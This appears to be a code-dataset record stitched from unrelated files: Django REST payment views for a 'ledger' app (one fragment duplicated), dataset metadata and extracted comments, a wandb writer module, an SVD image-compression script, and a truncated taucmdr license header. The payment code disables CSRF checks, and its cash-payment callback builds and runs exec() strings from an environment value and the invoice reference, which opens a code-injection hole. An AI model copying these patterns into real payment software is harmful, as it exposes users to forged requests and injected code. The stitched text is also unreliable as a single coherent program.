serializers.ValidationError(e) @detail_route(methods=['post']) def link(self, request, *args, **kwargs): try: invoice = self.get_object() serializer = BpayLinkSerializer(data=request.data) serializer.is_valid(raise_exception=True) bpay = BpayTransaction.objects.get(id=serializer.validated_data['bpay']) link = serializer.validated_data['link'] if link: if bpay.matched or bpay.linked: raise serializers.ValidationError('This BPAY transaction has already been linked to another invoice.') # Create a link between invoice and bpay txn try: InvoiceBPAY.objects.create(bpay=bpay,invoice=invoice) except Exception: raise else: # Delete the link between invoice and txn try: b= InvoiceBPAY.objects.get(bpay=bpay,invoice=invoice) b.delete() except Exception: raise # Get all linked bpay transactions linked = InvoiceBPAY.objects.filter(invoice=invoice).values('bpay') txns = BpayTransaction.objects.filter(id__in=linked) serializer = BpayTransactionSerializer(txns, many=True) return Response(serializer.data) except serializers.ValidationError: raise except Exception as e: raise serializers.ValidationError(e) ####################################################### # # # /INVOICE # # # ####################################################### ####################################################### # # # REPORTS # # # ####################################################### class ReportSerializer(serializers.Serializer): system = serializers.CharField(max_length=4) start = serializers.DateTimeField() end = serializers.DateTimeField() banked_start = serializers.DateTimeField(required=False,allow_null=True) banked_end = serializers.DateTimeField(required=False,allow_null=True) region = serializers.ChoiceField(required=False,allow_null=True,choices=REGION_CHOICES) district = serializers.ChoiceField(required=False,allow_null=True,choices=DISTRICT_CHOICES) items = serializers.BooleanField(default=False) '''def validate_system(self,value): try: if not is_valid_system(value): raise serializers.ValidationError('This is not a valid system.') except Exception as e: raise serializers.ValidationError(str(e)) return value''' def validate(self,data): if data['items'] and not (data['banked_start'] and data['banked_end']): raise serializers.ValidationError('banked_start and banked_end are required for items csv. ') return data class ReportCreateView(views.APIView): renderer_classes = (JSONRenderer,) def get(self,request,format=None): try: http_status = status.HTTP_200_OK #parse and validate data report = None data = { "start":request.GET.get('start'), "end":request.GET.get('end'), "banked_start":request.GET.get('banked_start',None), "banked_end":request.GET.get('banked_end',None), "system":request.GET.get('system'), "items": request.GET.get('items', False), "region": request.GET.get('region'), "district": request.GET.get('district') } serializer = ReportSerializer(data=data) serializer.is_valid(raise_exception=True) filename = 'report-{}-{}'.format(str(serializer.validated_data['start']),str(serializer.validated_data['end'])) # Generate Report if serializer.validated_data['items']: report = generate_items_csv(systemid_check(serializer.validated_data['system']), serializer.validated_data['start'], serializer.validated_data['end'], serializer.validated_data['banked_start'], serializer.validated_data['banked_end'], district = serializer.validated_data['district']) else: report = generate_trans_csv(systemid_check(serializer.validated_data['system']) ,serializer.validated_data['start'], serializer.validated_data['end'], district = serializer.validated_data['district']) if report: response = HttpResponse(FileWrapper(report), content_type='text/csv') response['Content-Disposition'] = 'attachment; filename="{}.csv"'.format(filename) return response else: raise serializers.ValidationError('No report was generated.') except serializers.ValidationError: raise except Exception as e: traceback.print_exc() raise serializers.ValidationError(str(e)) class ReportCreateAllocatedView(views.APIView): renderer_classes = (JSONRenderer,) def get(self,request,format=None): try: http_status = status.HTTP_200_OK #parse and validate data report = None data = { "start":request.GET.get('start'), "end":request.GET.get('end'), "banked_start":request.GET.get('banked_start',None), "banked_end":request.GET.get('banked_end',None), "system":request.GET.get('system'), "items": request.GET.get('items', False), "region": request.GET.get('region'), "district": request.GET.get('district') } serializer = ReportSerializer(data=data) serializer.is_valid(raise_exception=True) filename = 'report-{}-{}'.format(str(serializer.validated_data['start']),str(serializer.validated_data['end'])) # Generate Report if serializer.validated_data['items']: report = generate_items_csv_allocated(systemid_check(serializer.validated_data['system']), serializer.validated_data['start'], serializer.validated_data['end'], serializer.validated_data['banked_start'], serializer.validated_data['banked_end'], district = serializer.validated_data['district']) else: report = generate_trans_csv(systemid_check(serializer.validated_data['system']) ,serializer.validated_data['start'], serializer.validated_data['end'], district = serializer.validated_data['district']) if report: response = HttpResponse(FileWrapper(report), content_type='text/csv') response['Content-Disposition'] = 'attachment; filename="{}.csv"'.format(filename) return response else: raise serializers.ValidationError('No report was generated.') except serializers.ValidationError: raise except Exception as e: traceback.print_exc() raise serializers.ValidationError(str(e)) ####################################################### # # # /REPORTS # # # #######################################################
import json from django.db import transaction from django.conf import settings from django.http import HttpResponse, HttpResponseRedirect from django.template.loader import get_template from django.core.exceptions import ValidationError from django.core.urlresolvers import reverse from wsgiref.util import FileWrapper from rest_framework import viewsets, serializers, status, generics, views from rest_framework.renderers import JSONRenderer from rest_framework.response import Response from rest_framework.authentication import SessionAuthentication from rest_framework.permissions import IsAuthenticated from rest_framework.decorators import list_route,detail_route from ledger.payments.bpay.models import BpayTransaction, BpayFile, BpayCollection from ledger.payments.invoice.models import Invoice, InvoiceBPAY from ledger.payments.bpoint.models import BpointTransaction, BpointToken from ledger.payments.cash.models import CashTransaction, Region, District, DISTRICT_CHOICES, REGION_CHOICES from ledger.payments.models import TrackRefund from ledger.payments.utils import systemid_check, update_payments from ledger.payments.facade import bpoint_facade from ledger.payments.reports import generate_items_csv, generate_trans_csv, generate_items_csv_allocated from ledger.payments.emails import send_refund_email from ledger.accounts.models import EmailUser from oscar.apps.order.models import Order from oscar.apps.payment import forms from confy import env import traceback import six class CsrfExemptSessionAuthentication(SessionAuthentication): def enforce_csrf(self, request): return ####################################################### # # # BPAY # # # ####################################################### class BpayTransactionSerializer(serializers.ModelSerializer): type = serializers.SerializerMethodField() payment_instruction = serializers.SerializerMethodField() payment_method = serializers.SerializerMethodField() entry_method = serializers.SerializerMethodField() created = serializers.DateTimeField(format='%Y-%m-%d %H:%M:%S') payment_date = serializers.DateTimeField(source='p_date', format='%Y-%m-%d %H:%M:%S') reason_for_refund_or_reversal = serializers.SerializerMethodField() class Meta: model = BpayTransaction fields = ( "id", "created", "amount", "type", "cheque_num", "crn", "txn_ref", "service_code", "payment_instruction", "payment_method", "payment_date", "entry_method", "orig_ref_num", "reason_for_refund_or_reversal", "discretionary_data", "payer_name", "country", "state", "car", "discount_ref", "discount_method", "approved", "matched", "linked", "biller_code" ) def get_type(self, obj): return dict(BpayTransaction.TRANSACTION_TYPE).get(obj.type) def get_payment_instruction(self, obj): return dict(BpayTransaction.PAYMENT_INSTRUCTION_CODES).get(obj.p_instruction_code) def get_payment_method(self, obj): return dict(BpayTransaction.PAYMENT_METHOD_CODES).get(obj.p_method_code) def get_entry_method(self, obj): return dict(BpayTransaction.ENTRY_METHODS).get(obj.entry_method) def get_reason_for_refund_or_reversal(self, obj): return dict(BpayTransaction.REF_REV_CODE).get(obj.ref_rev_code) class BpayTransactionViewSet(viewsets.ReadOnlyModelViewSet): queryset = BpayTransaction.objects.all() serializer_class = BpayTransactionSerializer renderer_classes = (JSONRenderer,) search_fields = ( '=crn', ) def list(self, request, *args, **kwargs): queryset = self.get_queryset() sorting = request.GET.get('sorting',None) if sorting and sorting.lower() == 'unmatched': queryset = [q for q in queryset if not q.matched] serializer = self.get_serializer(queryset,many=True) return Response(serializer.data) class BpayFileSerializer(serializers.ModelSerializer): #date_modifier = serializers.SerializerMethodField() transactions = BpayTransactionSerializer(many=True) created = serializers.DateTimeField(format='%Y-%m-%d %H:%M:%S') #settled = serializers.DateTimeField(format='%Y-%m-%d %H:%M:%S') class Meta: model = BpayFile fields = ( "id", "inserted", "created", "file_id", #"settled", #"date_modifier", #"credit_items", #"credit_amount", #"cheque_items", #"cheque_amount", #"debit_amount", #"debit_items", #"account_total", #"account_records", #"group_total", #"group_accounts", #"group_records", #"file_total", #"file_groups", #"file_records", "transactions" ) def get_date_modifier(self, obj): return dict(BpayFile.DATE_MODIFIERS).get(obj.date_modifier) class BpayCollectionSerializer(serializers.ModelSerializer): created = serializers.DateField(source='date') number_of_files = serializers.IntegerField(source='count') class Meta: model = BpayCollection fields = ( 'created', 'number_of_files', 'credit_total', 'cheque_total', 'debit_total', 'total' ) def __init__(self,*args,**kwargs): try: txn_only = kwargs.pop("txns_only") except: txn_only = False super(BpayCollectionSerializer,self).__init__(*args, **kwargs) if txn_only: self.fields['transactions'] = BpayTransactionSerializer(many=True,read_only=True) else: self.fields['files'] = BpayFileSerializer(many=True) class BpayCollectionViewSet(viewsets.ReadOnlyModelViewSet): queryset = BpayCollection.objects.all() serializer_class = BpayCollectionSerializer renderer_classes = (JSONRenderer,) lookup_field = 'created' def retrieve(self, request, created=None, format=None): try: instance = BpayCollection.objects.get(date=created) txns_only = bool(request.GET.get('transactions',False)) serializer = BpayCollectionSerializer(instance,txns_only=txns_only) return Response(serializer.data) except serializers.ValidationError: raise except Exception as e: raise serializers.ValidationError(str(e)) class BpayFileList(viewsets.ReadOnlyModelViewSet): queryset = BpayFile.objects.all() serializer_class = BpayFileSerializer renderer_classes = (JSONRenderer,) ####################################################### # # # /BPAY # # # ####################################################### ####################################################### # # # BPOINT # # # ####################################################### class BpointTransactionSerializer(serializers.ModelSerializer): order = serializers.CharField(source='order.number') cardtype = serializers.SerializerMethodField() settlement_date = serializers.DateField(format='%B, %d %Y') source = serializers.CharField(source='type') crn = serializers.CharField(source='crn1') last_digits = serializers.SerializerMethodField() def get_cardtype(self, obj): return dict(BpointTransaction.CARD_TYPES).get(obj.cardtype) def get_last_digits(self,obj): return obj.last_digits class Meta: model = BpointTransaction fields = ( 'id', 'action', 'crn', 'source', 'amount', 'amount_surcharge', 'cardtype', 'order', 'txn_number', 'original_txn', 'receipt_number', 'response_code', 'response_txt', 'processed', 'settlement_date', 'approved', 'last_digits', 'refundable_amount' ) class AmountSerializer(serializers.Serializer): amount = serializers.DecimalField(max_digits=12, decimal_places=2) details = serializers.CharField(trim_whitespace=True) class BpointTransactionViewSet(viewsets.ModelViewSet): queryset = BpointTransaction.objects.all() serializer_class = BpointTransactionSerializer renderer_classes = (JSONRenderer,) def create(self,request): pass @detail_route(methods=['POST']) def refund(self,request,*args,**kwargs): try: http_status = status.HTTP_200_OK instance = self.get_object() serializer = AmountSerializer(data=request.data) serializer.is_valid(raise_exception=True) refund = instance.refund(serializer.validated_data,request.user) invoice = Invoice.objects.get(reference=instance.crn1) update_payments(invoice.reference) serializer = BpointTransactionSerializer(refund) return Response(serializer.data,status=http_status) except serializers.ValidationError: traceback.print_exc() raise except Exception as e: traceback.print_exc() raise serializers.ValidationError(str(e)) class CardSerializer(serializers.Serializer): cardholdername = serializers.CharField(required=False,max_length=50) number = serializers.CharField(min_length=13,max_length=16) cvn = serializers.CharField(min_length=3,max_length=4) expiry = serializers.DateField(input_formats=['%m%Y',]) class BpointPaymentSerializer(serializers.Serializer): invoice = serializers.CharField(max_length=50) amount = serializers.DecimalField(max_digits=12, decimal_places=2,required=False) card = CardSerializer(required=False) using_token = serializers.BooleanField(default=False) token = serializers.CharField(max_length=16, required=False) original_txn = serializers.CharField(max_length=50,required=False) action = serializers.ChoiceField(choices=BpointTransaction.ACTION_TYPES, default='payment') subtype = serializers.ChoiceField(choices=BpointTransaction.SUB_TYPES,default='single') type = serializers.ChoiceField(choices=BpointTransaction.TRANSACTION_TYPES) def validate(self, data): if data.get('using_token') and data.get('token') and data.get('card'): raise serializers.ValidationError("You can only use one method to make payments ie 'card' or 'token'.") if data['action'] in ['payment','preauth','unmatched_refund'] and not data.get('using_token') and not data.get('card'): raise serializers.ValidationError("For the selected action you need to provide 'card' details.") if data['action'] in ['payment','preauth','unmatched_refund'] and data.get('using_token') and not data.get('token'): raise serializers.ValidationError("You need to supply a stored card token if you are paying using the token.") if data['action'] in ['refund','capture','reversal'] and not data.get('original_txn'): raise serializers.ValidationError("For the selected action you need to provide the transaction number of the transaction matched to this one.") return data class BpointPaymentCreateView(generics.CreateAPIView): ''' Used to create a card point using the api: Example of json request using new card: { "invoice": "1000025", "amount": 1, "action": "payment", "type": "internet", "card": { "number": "4444333322221111", "cvn": "123", "expiry": "052017" } } Example of json request using stored card: { "invoice": "1000025", "amount": 1, "action": "payment", "type": "internet", "using_token": "true", "token": "<token_id" } } ''' serializer_class = BpointPaymentSerializer renderer_classes = (JSONRenderer,) class Bankcard(object): def __init__(self,number,cvn,expiry,name=None): self.name = name self.number = number self.cvn = cvn self.expiry = expiry def create(self, request): try: http_status = status.HTTP_200_OK #parse and validate data serializer = BpointPaymentSerializer(data=request.data) serializer.is_valid(raise_exception=True) txn,res,card, invoice_number, total,original_txn, reference = None, None, None, None, None, None, None # Get the optional paramters for the transaction if serializer.validated_data.get('amount'): total = serializer.validated_data['amount'] if serializer.validated_data.get('original_txn'): original_txn = serializer.validated_data['original_txn'] #Get card details if it is there if serializer.validated_data.get('card'): card_data = serializer.validated_data['card'] card = self.Bankcard( card_data.get('number'), card_data.get('cvn'), card_data.get('expiry').strftime("%m%Y") ) # Check if the invoice exists if action is payment,preauth try: inv = Invoice.objects.get(reference=serializer.validated_data['invoice']) reference = inv.reference except Invoice.DoesNotExist: raise serializers.ValidationError("The invoice doesn't exist.") if not total and serializer.validated_data['action'] in ['payment','preauth','unmatched_refund']: total = inv.amount # intialize the bpoint facade object facade = bpoint_facade if card: # Create card form data form_data = { 'expiry_month_0': card.expiry[:2], 'expiry_month_1': card.expiry[2:], 'ccv': card.cvn, 'number': card.number } # Validate card data using BankcardForm from oscar payments bankcard_form = forms.BankcardForm(form_data) if not bankcard_form.is_valid(): errors = bankcard_form.errors for e in errors: raise serializers.ValidationError(errors.get(e)[0]) txn = facade.post_transaction( serializer.validated_data['action'], serializer.validated_data['type'], serializer.validated_data['subtype'], inv.order_number, reference, total, bankcard_form.bankcard, original_txn ) elif serializer.validated_data.get('using_token'): # Get the token try: token = BpointToken.objects.get(id=serializer.validated_data.get('token')) except BpointToken.DoesNotExist: raise serializers.ValidationError("The selected stored card doesn't exist.") txn = facade.pay_with_storedtoken( serializer.validated_data['action'], serializer.validated_data['type'], serializer.validated_data['subtype'], serializer.validated_data.get('token'), inv.order_number, reference, total, original_txn ) res = BpointTransactionSerializer(BpointTransaction.objects.get(txn_number=txn.txn_number)) return Response(res.data) except serializers.ValidationError: raise except Exception as e: raise serializers.ValidationError(str(e)) ####################################################### # # # /BPOINT # # # ####################################################### ####################################################### # # # CASH # # # ####################################################### class CashSerializer(serializers.ModelSerializer): original_txn = serializers.CharField(required=False) amount = serializers.DecimalField(max_digits=12, decimal_places=2,required=False) details = serializers.CharField(allow_null=True,allow_blank=True,required=False) invoice = serializers.CharField(source='invoice.reference') external = serializers.BooleanField(default=False) region = serializers.CharField(required=False) district = serializers.CharField(required=False) class Meta: model = CashTransaction fields = ( 'invoice', 'amount', 'source', 'created', 'type', 'external', 'region', 'district', 'receipt', 'original_txn', 'details' ) def validate(self,data): if data['external'] and not (data.get('region') or data.get('district')): raise serializers.ValidationError('A region/district must be specified for an external payment.') if data['type'] == 'refund' and not data['details']: raise serializers.ValidationError('details are required for a refund') return data class CashViewSet(viewsets.ModelViewSet): '''Used to create a cash payment using the api: Example of json request: { "invoice": "1000025", "amount": 1, "details" : "refund details" "type": "payment" "source": "cash" } ''' queryset = CashTransaction.objects.all() serializer_class = CashSerializer def create(self,request,format=None): try: http_status = status.HTTP_200_OK #parse and validate data serializer = CashSerializer(data=request.data) serializer.is_valid(raise_exception=True) invoice,txn = None, None #Check if the invoice being paid for exists # Check if the invoice exists if action is payment,preauth try: invoice = Invoice.objects.get(reference=serializer.validated_data['invoice']['reference']) serializer.validated_data['invoice'] = invoice except Invoice.DoesNotExist: raise serializers.ValidationError("The invoice doesn't exist.") # Check if the amount was specified otherwise pay the whole amount if not serializer.validated_data.get('amount'): serializer.validated_data['amount'] = invoice.amount with transaction.atomic(): txn = serializer.save() if txn.type == 'refund': TrackRefund.objects.create(user=request.user,type=1,refund_id=txn.id,details=serializer.validated_data['details']) send_refund_email(invoice,'manual',txn.amount) update_payments(invoice.reference) LEDGER_INVOICE_TRANSACTION_CALLBACK_MODULE =env('LEDGER_INVOICE_TRANSACTION_CALLBACK_MODULE', '') if len(LEDGER_INVOICE_TRANSACTION_CALLBACK_MODULE) != 0: try: ltc = LEDGER_INVOICE_TRANSACTION_CALLBACK_MODULE.split(":") exec('import '+str(ltc[0])) exec(ltc[1]+"('"+invoice.reference+"')") except Exception as e: print (e) http_status = status.HTTP_201_CREATED serializer = CashSerializer(txn) return Response(serializer.data,status=http_status) except serializers.ValidationError: raise except ValidationError as e: raise serializers.ValidationError(str(''.join(e.error_dict.values()[0][0]))) except Exception as e: raise serializers.ValidationError(str(e[0])) class DistrictSerializer(serializers.ModelSerializer): name = serializers.SerializerMethodField() code = serializers.CharField(source='name') class Meta: model = District fields = ('name','code') def get_name(self, obj): return dict(DISTRICT_CHOICES).get(obj.name) class RegionSerializer(serializers.ModelSerializer): districts = DistrictSerializer(many=True) name = serializers.SerializerMethodField() code = serializers.CharField(source='name') class Meta: model = Region fields = ( 'name', 'code', 'districts' ) def get_name(self, obj): return dict(REGION_CHOICES).get(obj.name) class RegionViewSet(viewsets.ReadOnlyModelViewSet): queryset = Region.objects.all() serializer_class = RegionSerializer lookup_field = 'name' ####################################################### # # # /CASH # # # ####################################################### ####################################################### # # # INVOICE # # # ####################################################### class InvoiceTransactionSerializer(serializers.ModelSerializer): cash_transactions=CashSerializer(many=True) bpay_transactions=BpayTransactionSerializer(many=True) bpoint_transactions=BpointTransactionSerializer(many=True) created = serializers.DateTimeField(format='%Y-%m-%d %H:%M:%S') owner = serializers.CharField(source='owner.email') refundable_cards=BpointTransactionSerializer(many=True) class Meta: model = Invoice fields = ( 'id', 'owner', 'voided', 'order_number', 'num_items', 'amount', 'reference', 'created', 'balance', 'refundable', 'refundable_amount', 'single_card_payment', 'payment_amount', 'payment_status', 'cash_transactions', 'bpay_transactions', 'bpoint_transactions', 'refundable_cards' ) read_only_fields=( 'created', 'id', 'num_items' ) class BpayLinkSerializer(serializers.Serializer): bpay = serializers.IntegerField() link = serializers.BooleanField(default=True) def validate_bpay(self,val): try: BpayTransaction.objects.get(id=val) except BpayTransaction.DoesNotExist: raise serializers.ValidationError('The bpay transaction entered does not exist.') return val class InvoiceTransactionViewSet(viewsets.ModelViewSet): queryset = Invoice.objects.all() serializer_class = InvoiceTransactionSerializer lookup_field = 'reference' @detail_route(methods=['get']) def linked_bpay(self, request, *args, **kwargs): try: invoice = self.get_object() # Get all linked bpay transactions linked = InvoiceBPAY.objects.filter(invoice=invoice).values('bpay') txns = BpayTransaction.objects.filter(id__in=linked) serializer = BpayTransactionSerializer(txns, many=True) return Response(serializer.data) except serializers.ValidationError: raise except Exception as e: raise serializers.ValidationError(e) @detail_route(methods=['get']) def payments(self, request, *args, **kwargs): try: invoice = self.get_object() # Get all linked bpay transactions payments = [] #cash cash = invoice.cash_transactions.all() for c in cash: payments.append( { 'date':c.created.strftime('%d/%m/%Y'), 'type':c.get_source_display().lower().title() if c.type != 'refund' else 'Manual', 'details':"{}{}".format(c.get_type_display().lower().title(),": {}".format(c.details) if c.details else ''), 'amount':'$ {}'.format(c.amount) if c.type not in ['refund','move_out'] else '$ -{}'.format(c.amount) }) #bpay bpay = invoice.bpay_transactions for b in bpay: payments.append( { 'date':b.p_date.strftime('%d/%m/%Y'), 'type': 'Bpay', 'details':b.get_p_instruction_code_display().lower().title(), 'amount':'$ {}'.format(b.amount) } ) #bpoint bpoint = invoice.bpoint_transactions.filter(response_code=0) for b in bpoint: payments.append( { 'date':b.processed.strftime('%d/%m/%Y'), 'type': 'Credit Card', 'details':b.get_action_display().lower().title(), 'amount':'$ {}'.format(b.amount) if b.action != 'refund' else '$ -{}'.format(b.amount) } ) return Response(payments) except serializers.ValidationError: traceback.print_exc() raise except Exception as e: traceback.print_exc() raise serializers.ValidationError(e) @detail_route(methods=['post']) def link(self, request, *args, **kwargs): try: invoice = self.get_object() serializer = BpayLinkSerializer(data=request.data) serializer.is_valid(raise_exception=True) bpay = BpayTransaction.objects.get(id=serializer.validated_data['bpay']) link = serializer.validated_data['link'] if link: if bpay.matched or bpay.linked: raise serializers.ValidationError('This BPAY transaction has already been linked to another invoice.') # Create a link between invoice and bpay txn try: InvoiceBPAY.objects.create(bpay=bpay,invoice=invoice) except Exception: raise else: # Delete the link between invoice and txn try: b= InvoiceBPAY.objects.get(bpay=bpay,invoice=invoice) b.delete() except Exception: raise # Get all linked bpay transactions linked = InvoiceBPAY.objects.filter(invoice=invoice).values('bpay') txns = BpayTransaction.objects.filter(id__in=linked) serializer = BpayTransactionSerializer(txns, many=True) return Response(serializer.data) except serializers.ValidationError: raise except Exception as e: raise serializers.ValidationError(e) ####################################################### # # # /INVOICE # # # ####################################################### ####################################################### # # # REPORTS # # # ####################################################### class ReportSerializer(serializers.Serializer): system = serializers.CharField(max_length=4) start = serializers.DateTimeField() end = serializers.DateTimeField() banked_start = serializers.DateTimeField(required=False,allow_null=True) banked_end = serializers.DateTimeField(required=False,allow_null=True) region = serializers.ChoiceField(required=False,allow_null=True,choices=REGION_CHOICES) district = serializers.ChoiceField(required=False,allow_null=True,choices=DISTRICT_CHOICES) items = serializers.BooleanField(default=False) '''def validate_system(self,value): try: if not is_valid_system(value): raise serializers.ValidationError('This is not a valid system.') except Exception as e: raise serializers.ValidationError(str(e)) return value''' def validate(self,data): if data['items'] and not (data['banked_start'] and data['banked_end']): raise serializers.ValidationError('banked_start and banked_end are required for items csv. ') return data class ReportCreateView(views.APIView): renderer_classes = (JSONRenderer,) def get(self,request,format=None): try: http_status = status.HTTP_200_OK #parse and validate data report = None data = { "start":request.GET.get('start'), "end":request.GET.get('end'), "banked_start":request.GET.get('banked_start',None), "banked_end":request.GET.get('banked_end',None), "system":request.GET.get('system'), "items": request.GET.get('items', False), "region": request.GET.get('region'), "district": request.GET.get('district') } serializer = ReportSerializer(data=data) serializer.is_valid(raise_exception=True) filename = 'report-{}-{}'.format(str(serializer.validated_data['start']),str(serializer.validated_data['end'])) # Generate Report if serializer.validated_data['items']: report = generate_items_csv(systemid_check(serializer.validated_data['system']), serializer.validated_data['start'], serializer.validated_data['end'], serializer.validated_data['banked_start'], serializer.validated_data['banked_end'], district = serializer.validated_data['district']) else: report = generate_trans_csv(systemid_check(serializer.validated_data['system']) ,serializer.validated_data['start'], serializer.validated_data['end'], district = serializer.validated_data['district']) if report: response = HttpResponse(FileWrapper(report), content_type='text/csv') response['Content-Disposition'] = 'attachment; filename="{}.csv"'.format(filename) return response else: raise serializers.ValidationError('No report was generated.') except serializers.ValidationError: raise except Exception as e: traceback.print_exc() raise serializers.ValidationError(str(e)) class ReportCreateAllocatedView(views.APIView): renderer_classes = (JSONRenderer,) def get(self,request,format=None): try: http_status = status.HTTP_200_OK #parse and validate data report = None data = { "start":request.GET.get('start'), "end":request.GET.get('end'), "banked_start":request.GET.get('banked_start',None), "banked_end":request.GET.get('banked_end',None), "system":request.GET.get('system'), "items": request.GET.get('items', False), "region": request.GET.get('region'), "district": request.GET.get('district') } serializer = ReportSerializer(data=data) serializer.is_valid(raise_exception=True) filename = 'report-{}-{}'.format(str(serializer.validated_data['start']),str(serializer.validated_data['end'])) # Generate Report if serializer.validated_data['items']: report = generate_items_csv_allocated(systemid_check(serializer.validated_data['system']), serializer.validated_data['start'], serializer.validated_data['end'], serializer.validated_data['banked_start'], serializer.validated_data['banked_end'], district = serializer.validated_data['district']) else: report = generate_trans_csv(systemid_check(serializer.validated_data['system']) ,serializer.validated_data['start'], serializer.validated_data['end'], district = serializer.validated_data['district']) if report: response = HttpResponse(FileWrapper(report), content_type='text/csv') response['Content-Disposition'] = 'attachment; filename="{}.csv"'.format(filename) return response else: raise serializers.ValidationError('No report was generated.') except serializers.ValidationError: raise except Exception as e: traceback.print_exc() raise serializers.ValidationError(str(e)) ####################################################### # # # /REPORTS # # # #######################################################
de
0.301638
####################################################### # # # BPAY # # # ####################################################### #date_modifier = serializers.SerializerMethodField() #settled = serializers.DateTimeField(format='%Y-%m-%d %H:%M:%S') #"settled", #"date_modifier", #"credit_items", #"credit_amount", #"cheque_items", #"cheque_amount", #"debit_amount", #"debit_items", #"account_total", #"account_records", #"group_total", #"group_accounts", #"group_records", #"file_total", #"file_groups", #"file_records", ####################################################### # # # /BPAY # # # ####################################################### ####################################################### # # # BPOINT # # # ####################################################### Used to create a card point using the api: Example of json request using new card: { "invoice": "1000025", "amount": 1, "action": "payment", "type": "internet", "card": { "number": "4444333322221111", "cvn": "123", "expiry": "052017" } } Example of json request using stored card: { "invoice": "1000025", "amount": 1, "action": "payment", "type": "internet", "using_token": "true", "token": "<token_id" } } #parse and validate data # Get the optional paramters for the transaction #Get card details if it is there # Check if the invoice exists if action is payment,preauth # intialize the bpoint facade object # Create card form data # Validate card data using BankcardForm from oscar payments # Get the token ####################################################### # # # /BPOINT # # # ####################################################### ####################################################### # # # CASH # # # ####################################################### Used to create a cash payment using the api: Example of json request: { "invoice": "1000025", "amount": 1, "details" : "refund details" "type": "payment" "source": "cash" } #parse and validate data #Check if the invoice being paid for exists # Check if the invoice exists if action is payment,preauth # Check if the amount was specified otherwise pay the whole amount ####################################################### # # # /CASH # # # ####################################################### ####################################################### # # # INVOICE # # # ####################################################### # Get all linked bpay transactions # Get all linked bpay transactions #cash #bpay #bpoint # Create a link between invoice and bpay txn # Delete the link between invoice and txn # Get all linked bpay transactions ####################################################### # # # /INVOICE # # # ####################################################### ####################################################### # # # REPORTS # # # ####################################################### def validate_system(self,value): try: if not is_valid_system(value): raise serializers.ValidationError('This is not a valid system.') except Exception as e: raise serializers.ValidationError(str(e)) return value #parse and validate data # Generate Report #parse and validate data # Generate Report ####################################################### # # # /REPORTS # # # #######################################################
1.536754
2
wandb/sdk/internal/writer.py
Qwasser/client
0
6629042
# # -*- coding: utf-8 -*- """Writer thread.""" from __future__ import print_function import logging from . import datastore logger = logging.getLogger(__name__) class WriteManager(object): def __init__( self, settings, record_q, result_q, ): self._settings = settings self._record_q = record_q self._result_q = result_q self._ds = None def open(self): self._ds = datastore.DataStore() self._ds.open_for_write(self._settings.sync_file) def write(self, record): if not self._ds: self.open() record_type = record.WhichOneof("record_type") assert record_type self._ds.write(record) def finish(self): if self._ds: self._ds.close()
# # -*- coding: utf-8 -*- """Writer thread.""" from __future__ import print_function import logging from . import datastore logger = logging.getLogger(__name__) class WriteManager(object): def __init__( self, settings, record_q, result_q, ): self._settings = settings self._record_q = record_q self._result_q = result_q self._ds = None def open(self): self._ds = datastore.DataStore() self._ds.open_for_write(self._settings.sync_file) def write(self, record): if not self._ds: self.open() record_type = record.WhichOneof("record_type") assert record_type self._ds.write(record) def finish(self): if self._ds: self._ds.close()
en
0.909929
# # -*- coding: utf-8 -*- Writer thread.
2.693127
3
Examples/SVD_py/imgcomp.py
madhavakrishna/libStubs
0
6629043
#!/usr/bin/python3 import sys import numpy as np import matplotlib.pyplot as plt from PIL import Image def imageCompressionSVD(imggray,k): # Read image as matrix imgmat = np.array(list(imggray.getdata(band=0)),float) img_width = imggray.size[0] img_height = imggray.size[1] imgmat.shape = (img_height, img_width) imgmat = np.matrix(imgmat) U, sigma, V = np.linalg.svd(imgmat) if(k > sigma.shape[0]): k = len(sigma) compImg = np.matrix(U[:,:k]) * np.diag(sigma[:k]) * np.matrix(V[:k,:]) #plot image fig, (inImg,outImg) = plt.subplots(nrows=1,ncols=2,sharex=False,sharey=False) inImg.imshow(imgmat, cmap='gray') outImg.imshow(compImg, cmap='gray') plt.show() if __name__ == "__main__" : argc = len(sys.argv) if(argc != 3 or sys.argv[1] == "help") : print("usage: ./imgcomp <image-file> <int>") sys.exit(0) inputFile = sys.argv[1] k = int(sys.argv[2]) img = Image.open(inputFile) imggray = img.convert('L') #convert to gray-scale imageCompressionSVD(imggray,k)
#!/usr/bin/python3 import sys import numpy as np import matplotlib.pyplot as plt from PIL import Image def imageCompressionSVD(imggray,k): # Read image as matrix imgmat = np.array(list(imggray.getdata(band=0)),float) img_width = imggray.size[0] img_height = imggray.size[1] imgmat.shape = (img_height, img_width) imgmat = np.matrix(imgmat) U, sigma, V = np.linalg.svd(imgmat) if(k > sigma.shape[0]): k = len(sigma) compImg = np.matrix(U[:,:k]) * np.diag(sigma[:k]) * np.matrix(V[:k,:]) #plot image fig, (inImg,outImg) = plt.subplots(nrows=1,ncols=2,sharex=False,sharey=False) inImg.imshow(imgmat, cmap='gray') outImg.imshow(compImg, cmap='gray') plt.show() if __name__ == "__main__" : argc = len(sys.argv) if(argc != 3 or sys.argv[1] == "help") : print("usage: ./imgcomp <image-file> <int>") sys.exit(0) inputFile = sys.argv[1] k = int(sys.argv[2]) img = Image.open(inputFile) imggray = img.convert('L') #convert to gray-scale imageCompressionSVD(imggray,k)
en
0.742139
#!/usr/bin/python3 # Read image as matrix #plot image #convert to gray-scale
3.060578
3
packages/taucmdr/cf/software/papi_installation.py
eugeneswalker/taucmdr
0
6629044
# -*- coding: utf-8 -*- # # Copyright (c) 2015, ParaTools, Inc. # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are met: # (1) Redistributions of source code must retain the above copyright notice, # this list of conditions and the following disclaimer. # (2) Redistributions in binary form must reproduce the above copyright notice, # this list of conditions and the following disclaimer in the documentation # and/or other materials provided with the distribution. # (3) Neither the name of ParaTools, Inc. nor the names of its contributors may # be used to endorse or promote products derived from this software without # specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" # AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE # IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE # DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE # FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL # DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR # SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) 